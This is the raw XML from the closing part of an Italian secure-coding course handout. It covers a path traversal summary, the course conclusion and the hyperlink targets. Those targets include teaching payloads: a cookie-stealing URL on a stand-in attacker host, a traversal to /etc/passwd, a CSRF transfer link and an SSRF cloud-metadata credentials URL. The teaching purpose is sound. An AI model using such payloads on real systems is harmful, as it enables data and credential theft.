            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E, sopra tutto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Studiare bene quattro vulnerabilità e una mentalità è infinitamente più utile che studiare male tutti i dieci capitoli OWASP. Le idee si trasferiscono, gli attacchi cambiano, la disciplina del programmare con la mentalità avversaria resta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="433"/>
    <w:bookmarkStart w:id="434" w:name="riepilogo-del-capitolo-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="572" w:name="sec_10_8"/>
      <w:r>
        <w:t xml:space="preserve">10.8 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="572"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una vulnerabilità che permette di leggere file fuori dalla cartella consentita usando sequenze come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Categorizzato in OWASP A01 (Broken Access Control) della 2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tre difese sovrapposte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.basename</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(rimuove componenti di percorso), whitelist delle estensioni,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.realpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con verifica del prefisso. Tutte e tre, non una sola.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Soluzione preferita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: non passare nomi file dall’utente, passare ID dal database e ricavare il nome dal record.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cinque famiglie avanzate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">introdotte come ponte verso il secondo anno: CSRF, JWT con vulnerabilità di implementazione, SSRF, Insecure Deserialization, Mishandling of Exceptional Conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">La cybersecurity è una disciplina vasta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che continuerà a evolversi: questa dispensa è il punto di partenza, non di arrivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="434"/>
    <w:bookmarkStart w:id="435" w:name="conclusione-del-corso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="573" w:name="sec_10_9"/>
      <w:r>
        <w:t xml:space="preserve">10.9 Conclusione del corso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="573"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai finito.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai letto 10 capitoli (più due sotto-capitoli numerati). Hai installato un ambiente di sviluppo da zero. Hai costruito due applicazioni Flask:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MiniBlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Le hai estese, le hai violate, le hai corrette. Hai eseguito attacchi reali — login bypass, esfiltrazione dati via IDOR, furto di sessione via XSS, scoperta di CVE in dipendenze obsolete — sulla tua macchina, capendo per ogni attacco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">perché funziona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">come si chiude</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai imparato a riconoscere otto delle dieci categorie OWASP della 2025. Hai vocabolario per parlare di sicurezza con sviluppatori, manager, auditor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Soprattutto, hai (spero) iniziato a sviluppare quella che il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> chiamava la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mentalità avversaria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la disciplina di chiedersi non solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">come faccio funzionare questo?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">come si rompe?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non c’è strumento, framework, certificazione o checklist che possa sostituire quella disciplina. È la cosa che ti rende un programmatore consapevole della sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tieni questa dispensa. Tornaci quando, in stage o nel primo lavoro, scriverai il tuo primo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con dati di un utente reale. Sii il programmatore che si ricorda di mettere il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buona programmazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">— Alessandro Manneschi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SS4I S.r.l. · ITS Prodigi · ITS Empoli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A.F. 2024/2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="435"/>
    <w:bookmarkStart w:id="436" w:name="appendici"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="574" w:name="appendix"/>
      <w:r>
        <w:t xml:space="preserve">Appendici</w:t>
      </w:r>
      <w:bookmarkEnd w:id="574"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Appendice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Glossario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Appendice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Setup completo dell’ambiente (incorporata nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Appendice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Soluzioni dei laboratori</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Appendice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Cheat sheet OWASP Top 10:2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Appendice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Riferimenti bibliografici e link utili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Le </w:t>
      </w:r>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">appendici</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> verranno fornite come documenti separati.)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="436"/>
    <w:bookmarkEnd w:id="437"/>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId9"/>
      <w:footerReference w:type="default" r:id="rId1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Pagina </w:t>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> di </w:t>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66666"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t>Sviluppo Sicuro del Software — Dispensa Primo Anno ITS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hyperlink" Target="https://www.python.org/downloads/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.python.org/downloads/macos/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.visualstudio.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlitebrowser.org/dl/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/download/win" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ss4i/BancaPiccola.git" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://miosito.it/api/utenti/42" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.repubblica.it" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bancapiccola.it:443/conto/fatture?anno=2025&amp;mese=3#riepilogo" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ss4i/BancaPiccola" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/api/messaggi" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/api/login" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/api/messaggi/1" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/login" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/cerca?q=conto" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/cerca?q=" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/fattura/3" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/fattura/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bancapiccola.it" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bancapiccola.it" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.bancapiccola.it" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bancapiccola.it:443" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bancapiccola.it:8443" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sito-vulnerabile.it/cerca?q=" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bancapiccola-secure.it" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attaccante.it/raccolta?c=" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:6666/raccolta?c=" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/prodotto/1" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.org/project/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/leggi?doc=termini.txt" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/leggi?doc=privacy.txt" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/leggi?doc=../segreto.txt" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/leggi?doc=../../../../etc/passwd" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banca.it/bonifico?dest=ATT&amp;importo=10000" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:6379" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.0.5/admin" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://169.254.169.254/latest/meta-data/iam/security-credent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Sviluppo Sicuro del Software</dc:title>
  <dc:creator>Ing. Alessandro Manneschi</dc:creator>
  <dc:language>it-IT</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-20T11:58:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-20T11:58:27Z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Anno Formativo 2024/2025</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="subtitle">
    <vt:lpwstr>Dispensa Completa per il Primo Anno ITS</vt:lpwstr>
  </property>
</Properties>
</file>